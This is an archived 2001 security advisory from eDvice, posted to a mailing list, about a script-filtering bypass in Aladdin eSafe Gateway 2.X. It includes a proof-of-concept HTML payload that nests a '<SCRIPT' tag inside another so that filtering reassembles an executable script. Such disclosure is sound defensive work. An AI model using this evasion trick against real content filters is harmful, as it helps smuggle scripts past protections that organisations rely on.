OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: eDvice Security Services (supportedvicetech.com)
Date: Tue May 29 2001 - 16:41:39 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    29 May 2001

    This is the first of 3 sequential advisories we are issuing today regarding
    Aladdin eSafe Gateway.
    This advisory replaces our advisory from 16 May 2001.

    Status
    ---------
    The entire content of this advisory was reviewed and acknowledged by
    Aladdin.
    The vulnerability reffers to version 2.X of the product and not to version
    3.0 (as was presented in our previous advisory).
    Please see our following two advisories for vulnerabilities in version 3.0.

    Product Background
    --------------------------
    eSafe Gateway is an Internet Content Security product.

    You can configure eSafe Gateway to remove scripts (VBScripts, JavaScripts)
    and other executable tags from incoming HTML documents. Alternatively, the
    administrator can ban certain scripting commands from appearing inside
    scripts. The banned commands will be removed, while the rest of the HTML
    page is left intact.

    Scope
    ---------
    eDvice recently conducted a test of eSafe's ability to remove scripts from
    HTML documents. Although scripts are widely used by many web-sites, some
    organizations requesting to allow only limited use of Internet access from
    their internal network, prefer to disable scripting capabilities in order to
    avoid various known, as well as yet to be found, browser-based attacks.

    The Findings
    ------------------
    eSafe gateway analyzes the incoming HTML file and searches for the keyword
    "<SCRIPT'. From the moment the keyword was found, eSafe looks for a
    following "</Script>" keyword and then replaces the entire content between
    these keywords with spaces.

    On version 2.X of eSafe Gateway, if a "<SCRIPT" keyword follows another
    "<SCRIPT" keyword, without any "</SCRIPT>" in between, eSafe ignores the
    first "<SCRIPT". This behavior allows the attacker to bypass eSafe's
    filtering mechanism, as demonstrated above.

    However, it seems that in the release version of eSafe 3.0, the first
    "<SCRIPT" keyword is not ignored, and hence this type of attack fails.

    Details
    ---------
    Let's say for example that we want the following HTML code to enter an
    organization and the script it contains to be executed:

    <HTML><HEAD></HEAD>
    <BODY>
    <SCRIPT language="JavaScript">
    alert("hi");
    </SCRIPT>
    </BODY></HTML>

    If we run this page through eSafe's filtering engine, the script will be
    filtered and the resulting with the following HTML code:

    <HTML><HEAD></HEAD>
    <BODY>

    </BODY></HTML>

    However, if we create the following code:

    <HTML><HEAD></HEAD>
    <BODY>
    <SCRIPT<script language="javascript"> </script> language="javascript">
    alert("hi");
    </SCRIPT>
    </BODY></HTML>

    Then the inner "<script language="javascript"> </script>" will be extracted
    and we will be left with the following HTML code:

    <HTML><HEAD></HEAD>
    <BODY>
    <SCRIPT language="javascript">
    alert("hi");
    </SCRIPT>
    </BODY></HTML>

    Solution
    -----------
    Do not rely on eSafe Gateway version 2.X for HTML filtering.
    eSafe Gateway 3.0 is not vulnerable to this attack, see our following two
    advisories for vulnerabilities in version 3.0.

    ====================
    Discovered by:
    eDvice Security Services
    supportedvicetech.com
    http://www.edvicetech.com
    Tel: +972-3-6120133
    Fax: +972-3-6954837